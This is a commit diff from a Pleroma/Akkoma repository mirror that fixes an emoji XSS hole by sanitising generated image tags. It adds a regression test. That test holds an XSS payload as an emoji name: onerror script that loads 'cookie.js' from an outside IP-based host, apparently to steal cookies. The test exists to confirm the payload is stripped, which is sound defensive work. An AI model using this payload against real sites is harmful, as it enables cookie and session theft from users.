mirror of
https://akkoma.dev/AkkomaGang/akkoma.git
synced 2024-11-04 23:53:11 +00:00
Merge branch 'security/emoji-xss' into 'develop'
formatter: don't add XSS emoji See merge request pleroma/pleroma!322
This commit is contained in:
commit
3370fab1d0
|
@ -154,6 +154,7 @@ defmodule Pleroma.Formatter do
|
||||||
MediaProxy.url(file)
|
MediaProxy.url(file)
|
||||||
}' />"
|
}' />"
|
||||||
)
|
)
|
||||||
|
|> HtmlSanitizeEx.basic_html()
|
||||||
end)
|
end)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -189,11 +189,26 @@ defmodule Pleroma.FormatterTest do
|
||||||
text = "I love :moominmamma:"
|
text = "I love :moominmamma:"
|
||||||
|
|
||||||
expected_result =
|
expected_result =
|
||||||
"I love <img height='32px' width='32px' alt='moominmamma' title='moominmamma' src='/finmoji/128px/moominmamma-128.png' />"
|
"I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />"
|
||||||
|
|
||||||
assert Formatter.emojify(text) == expected_result
|
assert Formatter.emojify(text) == expected_result
|
||||||
end
|
end
|
||||||
|
|
||||||
|
test "it does not add XSS emoji" do
|
||||||
|
text =
|
||||||
|
"I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
|
||||||
|
|
||||||
|
custom_emoji = %{
|
||||||
|
"'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
|
||||||
|
"https://placehold.it/1x1"
|
||||||
|
}
|
||||||
|
|
||||||
|
expected_result =
|
||||||
|
"I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />"
|
||||||
|
|
||||||
|
assert Formatter.emojify(text, custom_emoji) == expected_result
|
||||||
|
end
|
||||||
|
|
||||||
test "it returns the emoji used in the text" do
|
test "it returns the emoji used in the text" do
|
||||||
text = "I love :moominmamma:"
|
text = "I love :moominmamma:"
|
||||||
|
|
||||||
|
|
|
@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do
|
||||||
}
|
}
|
||||||
|
|
||||||
expected_html =
|
expected_html =
|
||||||
"<p>2hu</p>alert('YAY')Some <img height='32px' width='32px' alt='2hu' title='2hu' src='corndog.png' /> content mentioning <a href=\"#{
|
"<p>2hu</p>alert('YAY')Some <img height=\"32px\" width=\"32px\" alt=\"2hu\" title=\"2hu\" src=\"corndog.png\" /> content mentioning <a href=\"#{
|
||||||
mentioned_user.ap_id
|
mentioned_user.ap_id
|
||||||
}\">@shp</a>"
|
}\">@shp</a>"
|
||||||
|
|
||||||
|
|
|
@ -22,7 +22,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do
|
||||||
|
|
||||||
test "A user with emoji in username", %{user: user} do
|
test "A user with emoji in username", %{user: user} do
|
||||||
expected =
|
expected =
|
||||||
"<img height='32px' width='32px' alt='karjalanpiirakka' title='karjalanpiirakka' src='/file.png' /> man"
|
"<img height=\"32px\" width=\"32px\" alt=\"karjalanpiirakka\" title=\"karjalanpiirakka\" src=\"/file.png\" /> man"
|
||||||
|
|
||||||
user = %{
|
user = %{
|
||||||
user
|
user
|
||||||
|
|
Loading…
Reference in a new issue